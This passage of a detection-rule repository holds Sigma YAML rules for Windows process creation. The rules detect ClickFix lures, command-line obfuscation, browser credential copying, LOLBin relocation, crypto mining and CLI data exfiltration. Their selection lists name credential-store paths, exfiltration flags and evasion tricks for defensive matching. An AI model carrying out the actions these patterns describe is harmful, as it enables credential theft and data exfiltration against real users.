    "content": "title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments\nid: a7c3d773-caef-227e-a7e7-c2f13c622329\nrelated:\n    - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add\n      type: obsolete\nstatus: test\ndescription: |\n    Detects attackers using tooling with bad opsec defaults.\n    E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\n    One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\nreferences:\n    - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/\n    - https://www.cobaltstrike.com/help-opsec\n    - https://twitter.com/CyberRaiju/status/1251492025678983169\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32\n    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool\n    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool\nauthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)\ndate: 2020-10-23\nmodified: 2024-08-15\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_werfault:\n        Image|endswith: '\\WerFault.exe'\n        CommandLine|endswith: 'WerFault.exe'\n    selection_rundll32:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith: 'rundll32.exe'\n    selection_regsvcs:\n        Image|endswith: '\\regsvcs.exe'\n        CommandLine|endswith: 'regsvcs.exe'\n    selection_regasm:\n        Image|endswith: '\\regasm.exe'\n        CommandLine|endswith: 'regasm.exe'\n    selection_regsvr32:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|endswith: 'regsvr32.exe'\n    filter_optional_edge_update:\n        ParentImage|contains: '\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith: 'rundll32.exe'\n    filter_optional_chromium_installer:\n        # As reported in https://github.com/SigmaHQ/sigma/issues/4570 and others\n        ParentImage|contains:\n            - '\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\'\n            - '\\AppData\\Local\\Google\\Chrome\\Application\\'\n        ParentImage|endswith: '\\Installer\\setup.exe'\n        ParentCommandLine|contains: '--uninstall '\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith: 'rundll32.exe'\n    condition: 1 of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_browser_launch_from_document_reader_process.yml",
    "content": "title: Potential Suspicious Browser Launch From Document Reader Process\nid: 1193d960-2369-499f-a158-7b50a31df682\nstatus: test\ndescription: |\n    Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.\nreferences:\n    - https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/ # PDF Document\n    - https://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/ # Office Document\nauthor: Joseph Kamau\ndate: 2024-05-27\nmodified: 2025-10-07\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|contains:\n            - 'Acrobat Reader'\n            - 'Microsoft Office'\n            - 'PDF Reader'\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\maxthon.exe'\n            - '\\seamonkey.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains: 'http'\n    filter_main_microsoft_help:\n        CommandLine|contains: 'https://go.microsoft.com/fwlink/'\n    filter_optional_foxit:\n        CommandLine|contains:\n            - 'http://ad.foxitsoftware.com/adlog.php?'\n            - 'https://globe-map.foxitservice.com/go.php?do=redirect'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml",
    "content": "title: Suspicious Child Process Created as System\nid: 590a5f4c-6c8c-4f10-8307-89afe9453a9d\nstatus: test\ndescription: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/\n    - https://github.com/antonioCoco/RogueWinRM\n    - https://twitter.com/Cyb3rWard0g/status/1453123054243024897\nauthor: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)\ndate: 2019-10-26\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.002\nlogsource:\n    category: process_creation\n    product: windows\n    definition: 'Requirements: ParentUser field needs sysmon >= 13.30'\ndetection:\n    selection:\n        ParentUser|contains:\n            - 'AUTHORI'\n            - 'AUTORI'\n        ParentUser|endswith:\n            - '\\NETWORK SERVICE'\n            - '\\LOCAL SERVICE'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        User|endswith: # System\n            - '\\SYSTEM'\n            - '\\Système'\n            - '\\СИСТЕМА'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    filter_rundll32:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains: 'DavSetCookie'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml",
    "content": "title: Potential Commandline Obfuscation Using Escape Characters\nid: f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd\nstatus: test\ndescription: Detects potential commandline obfuscation using known escape characters\nreferences:\n    - https://twitter.com/vysecurity/status/885545634958385153\n    - https://twitter.com/Hexacorn/status/885553465417756673 # Dead link\n    - https://twitter.com/Hexacorn/status/885570278637678592 # Dead link\n    - https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques\n    - https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/\nauthor: juju4\ndate: 2018-12-11\nmodified: 2023-03-03\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # - <TAB>   # no TAB modifier in sigmac yet, so this matches <TAB> (or TAB in elasticsearch backends without DSL queries)\n            - 'h^t^t^p'\n            - 'h\"t\"t\"p'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml",
    "content": "title: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image\nid: 584bca0f-3608-4402-80fd-4075ff6072e3\nrelated:\n    - id: e0552b19-5a83-4222-b141-b36184bb8d79\n      type: similar\n    - id: ad691d92-15f2-4181-9aa4-723c74f9ddc3 # RTLO\n      type: similar\n    - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9\n      type: obsolete\nstatus: test\ndescription: |\n    Detects potential commandline obfuscation using unicode characters.\n    Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\nreferences:\n    - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http\nauthor: frack113, Florian Roth (Nextron Systems), Josh Nickels\ndate: 2024-09-02\nmodified: 2025-05-30\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        OriginalFileName:\n            - 'Cmd.EXE'\n            - 'cscript.exe'\n            - 'PowerShell.EXE'\n            - 'PowerShell_ISE.EXE'\n            - 'pwsh.dll'\n            - 'wscript.exe'\n    selection_special_chars:\n        CommandLine|contains:\n            # spacing modifier letters that get auto-replaced\n            - 'ˣ' # 0x02E3\n            - '˪' # 0x02EA\n            - 'ˢ' # 0x02E2\n            # Forward slash alternatives\n            - '∕' # 0x22FF\n            - '⁄' # 0x206F\n            # Hyphen alternatives\n            - '―' # 0x2015\n            - '—' # 0x2014\n            # Whitespace that don't work as path separator\n            - ' ' # 0x00A0\n            # Other\n            - '¯'\n            - '®'\n            - '¶'\n            # Unicode whitespace characters\n            - '⠀' # Braille Pattern Blank (Unicode: U+2800)\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_clickfix_filefix_execution.yml",
    "content": "title: Suspicious ClickFix/FileFix Execution Pattern\nid: d487ed4a-fd24-436d-a0b2-f4e95f7b2635\nrelated:\n    - id: f5fe36cf-f1ec-4c23-903d-09a3110f6bbb\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix).\n    Attackers leverage social engineering campaigns—such as fake CAPTCHA challenges or urgent alerts—encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.\nreferences:\n    - https://github.com/JohnHammond/recaptcha-phish\n    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware\n    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/\n    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2\n    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution\n    - https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/ # filefix variant\nauthor: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-19\ntags:\n    - attack.execution\n    - attack.t1204.001\n    - attack.t1204.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\explorer.exe'\n        CommandLine|contains: '#'\n    selection_cli_captcha:\n        CommandLine|contains:\n            - 'account'\n            - 'anti-bot'\n            - 'botcheck'\n            - 'captcha'\n            - 'challenge'\n            - 'confirmation'\n            - 'fraud'\n            - 'human'\n            - 'identification'\n            - 'identificator'\n            - 'identity'\n            - 'robot'\n            - 'validation'\n            - 'verification'\n            - 'verify'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_clickfix_filefix_whitespace_padding.yml",
    "content": "title: Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix\nid: 3ae9974a-eb09-4044-8e70-8980a50c12c8\nrelated:\n    - id: 8f2a5c3d-9e4b-4a7c-8d1f-2e5a6b9c3d7e\n      type: similar\n    - id: 7a1b4c5e-8f3d-4b9a-7c2e-1f4a5b8c6d9e\n      type: similar\nstatus: experimental\ndescription: |\n    Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.\n    ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.\n    The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.\nreferences:\n    - https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/\n    - https://mrd0x.com/filefix-clickfix-alternative/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-04\nmodified: 2025-11-26\ntags:\n    - attack.execution\n    - attack.t1204.004\n    - attack.defense-evasion\n    - attack.t1027.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_explorer:\n        ParentImage|endswith: '\\explorer.exe'\n        CommandLine|contains: '#'\n    selection_space_variation:\n        CommandLine|contains:\n            - '            ' # En Quad (U+2000)\n            - '            ' # Em Quad (U+2001)\n            - '            ' # En Space (U+2002)\n            - '            ' # Em Space (U+2003)\n            - '            ' # Three-Per-Em Space (U+2004)\n            - '            ' # Four-Per-Em Space (U+2005)\n            - '            ' # Six-Per-Em Space (U+2006)\n            - '            ' # Figure Space (U+2007)\n            - '            ' # Punctuation Space (U+2008)\n            - '            ' # Thin Space (U+2009)\n            - '            ' # Hair Space (U+200A)\n            - '            ' # No-Break Space (U+00A0)\n            - '            ' # Normal space (0x20)\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_cmd_for_loop_execution_with_recursive_directory_search.yml",
    "content": "title: Suspicious Usage of For Loop with Recursive Directory Search in CMD\nid: 2782fbd8-b662-4eb5-9962-5bfbfb671e7b\nstatus: experimental\ndescription: |\n    Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.\n    This pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.\n    This behavior has been observed in various malicious lnk files.\nreferences:\n    - https://www.virustotal.com/gui/file/29837d0d3202758063185828c8f8d9e0b7b42b365c8941cc926d2d7c7bae2fb3\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2025-11-12\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - attack.defense-evasion\n    - attack.t1027.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tokens:\n        CommandLine|contains|all:\n            - 'for /f'\n            - 'tokens='\n            - 'in ('\n            - 'dir'\n    selection_tokens_parent:\n        ParentCommandLine|contains|all:\n            - 'for /f'\n            - 'tokens='\n            - 'in ('\n            - 'dir'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml",
    "content": "title: Potential Command Line Path Traversal Evasion Attempt\nid: 1327381e-6ab0-4f38-b583-4c1b8346a56b\nstatus: test\ndescription: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline\nreferences:\n    - https://twitter.com/hexacorn/status/1448037865435320323\n    - https://twitter.com/Gal_B1t/status/1062971006078345217\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-10-26\nmodified: 2023-03-29\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        Image|contains: '\\Windows\\'\n        CommandLine|contains:\n            - '\\..\\Windows\\'\n            - '\\..\\System32\\'\n            - '\\..\\..\\'\n    selection_2:\n        CommandLine|contains: '.exe\\..\\'\n    filter_optional_google_drive:\n        CommandLine|contains: '\\Google\\Drive\\googledrivesync.exe\\..\\'\n    filter_optional_citrix:\n        CommandLine|contains: '\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\'\n    condition: 1 of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Google Drive\n    - Citrix\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_copy_browser_data.yml",
    "content": "title: Potential Browser Data Stealing\nid: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b\nrelated:\n    - id: fc028194-969d-4122-8abe-0470d5b8f12f\n      type: derived\nstatus: test\ndescription: |\n    Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\n    Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\n    Web browsers typically store the credentials in an encrypted format within a credential store.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md\n    - https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-23\nmodified: 2025-03-19\ntags:\n    - attack.credential-access\n    - attack.t1555.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        - CommandLine|contains:\n              - 'copy-item'\n              - 'copy '\n              - 'cpi '\n              - ' cp '\n              - 'move '\n              - 'move-item'\n              - ' mi '\n              - ' mv '\n        - Image|endswith:\n              - '\\esentutl.exe' # akira ransomware\n              - '\\xcopy.exe'\n              - '\\robocopy.exe'\n        - OriginalFileName:\n              - 'esentutl.exe'\n              - 'XCOPY.EXE'\n              - 'robocopy.exe'\n    selection_path:\n        CommandLine|contains:\n            - '\\Amigo\\User Data'\n            - '\\BraveSoftware\\Brave-Browser\\User Data'\n            - '\\CentBrowser\\User Data'\n            - '\\Chromium\\User Data'\n            - '\\CocCoc\\Browser\\User Data'\n            - '\\Comodo\\Dragon\\User Data'\n            - '\\Elements Browser\\User Data'\n            - '\\Epic Privacy Browser\\User Data'\n            - '\\Google\\Chrome Beta\\User Data'\n            - '\\Google\\Chrome SxS\\User Data'\n            - '\\Google\\Chrome\\User Data\\'\n            - '\\Kometa\\User Data'\n            - '\\Maxthon5\\Users'\n            - '\\Microsoft\\Edge\\User Data'\n            - '\\Mozilla\\Firefox\\Profiles'\n            - '\\Nichrome\\User Data'\n            - '\\Opera Software\\Opera GX Stable\\'\n            - '\\Opera Software\\Opera Neon\\User Data'\n            - '\\Opera Software\\Opera Stable\\'\n            - '\\Orbitum\\User Data'\n            - '\\QIP Surf\\User Data'\n            - '\\Sputnik\\User Data'\n            - '\\Torch\\User Data'\n            - '\\uCozMedia\\Uran\\User Data'\n            - '\\Vivaldi\\User Data'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml",
    "content": "title: Copy From Or To Admin Share Or Sysvol Folder\nid: 855bc8b5-2ae8-402e-a9ed-b889e6df1900\nstatus: test\ndescription: Detects a copy command or a copy utility execution to or from an Admin share or remote\nreferences:\n    - https://twitter.com/SBousseaden/status/1211636381086339073\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\n    - https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html\n    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\nauthor: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali\ndate: 2019-12-30\nmodified: 2025-10-22\ntags:\n    - attack.lateral-movement\n    - attack.collection\n    - attack.exfiltration\n    - attack.t1039\n    - attack.t1048\n    - attack.t1021.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_target:\n        CommandLine|contains:\n            - '\\\\\\\\*\\\\*$' # example \\\\SVR_NAME\\ADMIN$\n            - '\\Sysvol\\'\n    selection_other_tools:\n        - Image|endswith:\n              - '\\robocopy.exe'\n              - '\\xcopy.exe'\n        - OriginalFileName:\n              - 'robocopy.exe'\n              - 'XCOPY.EXE'\n    selection_cmd_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cmd_cli:\n        CommandLine|contains: 'copy'\n    selection_pwsh_img:\n        - Image|contains:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'powershell_ise.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_pwsh_cli:\n        CommandLine|contains:\n            - 'copy-item'\n            - 'copy '\n            - 'cpi '\n            - ' cp '\n            - 'move '\n            - ' move-item'\n            - ' mi '\n            - ' mv '\n    condition: selection_target and (selection_other_tools or all of selection_cmd_* or all of selection_pwsh_*)\nfalsepositives:\n    - Administrative scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml",
    "content": "title: Suspicious Copy From or To System Directory\nid: fff9d2b7-e11c-4a69-93d3-40ef66189767\nrelated:\n    - id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900\n      type: derived\nstatus: test\ndescription: |\n    Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.\n    Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.\nreferences:\n    - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\n    - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\nauthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-07-03\nmodified: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: 'copy '\n    selection_img_pwsh:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - 'copy-item'\n            - ' copy '\n            - 'cpi '\n            - ' cp '\n    selection_img_other:\n        - Image|endswith:\n              - '\\robocopy.exe'\n              - '\\xcopy.exe'\n        - OriginalFileName:\n              - 'robocopy.exe'\n              - 'XCOPY.EXE'\n    selection_target:\n        CommandLine|re|i: \\s['\"]?C:\\\\Windows\\\\(System32|SysWOW64|WinSxS)\n    filter_optional_avira:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '/c copy'\n            - '\\Temp\\'\n            - '\\avira_system_speedup.exe'\n        CommandLine|contains:\n            - 'C:\\Program Files\\Avira\\'\n            - 'C:\\Program Files (x86)\\Avira\\'\n    condition: 1 of selection_img_* and selection_target and not 1 of filter_optional_*\nfalsepositives:\n    - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)\n    - When cmd.exe and xcopy.exe are called directly #  C:\\Windows\\System32\\cmd.exe /c copy file1 file2\n    - When the command contains the keywords but not in the correct order\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml",
    "content": "title: LOL-Binary Copied From System Directory\nid: f5d19838-41b5-476c-98d8-ba8af4929ee2\nrelated:\n    - id: fff9d2b7-e11c-4a69-93d3-40ef66189767\n      type: derived\nstatus: test\ndescription: |\n    Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.\nreferences:\n    - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\n    - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\n    - https://www.virustotal.com/gui/file/14e722855605ba78dc1d21153f0e1be90e7528149f2cd2d7d6eba8ef27534bdc/behavior\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-29\nmodified: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: 'copy '\n    selection_tools_pwsh:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - 'copy-item'\n            - ' copy '\n            - 'cpi '\n            - ' cp '\n    selection_tools_other:\n        - Image|endswith:\n              - '\\robocopy.exe'\n              - '\\xcopy.exe'\n        - OriginalFileName:\n              - 'robocopy.exe'\n              - 'XCOPY.EXE'\n    selection_target_path:\n        CommandLine|contains:\n            - '\\System32'\n            - '\\SysWOW64'\n            - '\\WinSxS'\n    selection_target_lolbin:\n        CommandLine|contains:\n            # Note: add more binaries to increase coverage\n            - '\\bitsadmin.exe'\n            - '\\calc.exe'\n            - '\\certutil.exe'\n            - '\\cmdl32.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n            - '\\ie4uinit.exe'\n    condition: 1 of selection_tools_* and all of selection_target_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_crypto_mining_monero.yml",
    "content": "title: Potential Crypto Mining Activity\nid: 66c3b204-9f88-4d0a-a7f7-8a57d521ca55\nstatus: stable\ndescription: Detects command line parameters or strings often used by crypto miners\nreferences:\n    - https://www.poolwatch.io/coin/monero\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-26\nmodified: 2023-02-13\ntags:\n    - attack.impact\n    - attack.t1496\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' --cpu-priority='\n            - '--donate-level=0'\n            - ' -o pool.'\n            - ' --nicehash'\n            - ' --algo=rx/0 '\n            - 'stratum+tcp://'\n            - 'stratum+udp://'\n            # base64 encoded: --donate-level=\n            - 'LS1kb25hdGUtbGV2ZWw9'\n            - '0tZG9uYXRlLWxldmVsP'\n            - 'tLWRvbmF0ZS1sZXZlbD'\n            # base64 encoded: stratum+tcp:// and stratum+udp://\n            - 'c3RyYXR1bSt0Y3A6Ly'\n            - 'N0cmF0dW0rdGNwOi8v'\n            - 'zdHJhdHVtK3RjcDovL'\n            - 'c3RyYXR1bSt1ZHA6Ly'\n            - 'N0cmF0dW0rdWRwOi8v'\n            - 'zdHJhdHVtK3VkcDovL'\n    filter:\n        CommandLine|contains:\n            - ' pool.c '\n            - ' pool.o '\n            - 'gcc -'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of crypto miners\n    - Some build frameworks\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml",
    "content": "title: Potential Data Exfiltration Activity Via CommandLine Tools\nid: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab\nstatus: test\ndescription: Detects the use of various CLI utilities exfiltrating data via web requests\nreferences:\n    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-02\nmodified: 2025-10-19\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_iwr:\n        Image|endswith:\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\cmd.exe'\n        CommandLine|contains:\n            - 'curl '\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - 'irm '\n            - 'iwr '\n            - 'wget '\n        CommandLine|contains|all:\n            - ' -ur' # Shortest possible version of the -uri flag\n            - ' -me' # Shortest possible version of the -method flag\n            - ' -b'\n            - ' POST '\n    selection_curl:\n        Image|endswith: '\\curl.exe'\n        CommandLine|contains: '--ur' # Shortest possible version of the --uri flag\n    selection_curl_data:\n        CommandLine|contains:\n            - ' -d ' # Shortest possible version of the --data flag\n            - ' --data '\n    selection_wget:\n        Image|endswith: '\\wget.exe'\n        CommandLine|contains:\n            - '--post-data'\n            - '--post-file'\n    payloads:\n        - CommandLine|re:\n              - 'net\\s+view'\n              - 'sc\\s+query'\n        - CommandLine|contains:\n              - 'Get-Content'\n              - 'GetBytes'\n              - 'hostname'\n              - 'ifconfig'\n              - 'ipconfig'\n              - 'netstat'\n              - 'nltest'\n              - 'qprocess'\n              - 'systeminfo'\n              - 'tasklist'\n              - 'ToBase64String'\n              - 'whoami'\n        - CommandLine|contains|all:\n              - 'type '\n              - ' > '\n              - ' C:\\'\n    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml",
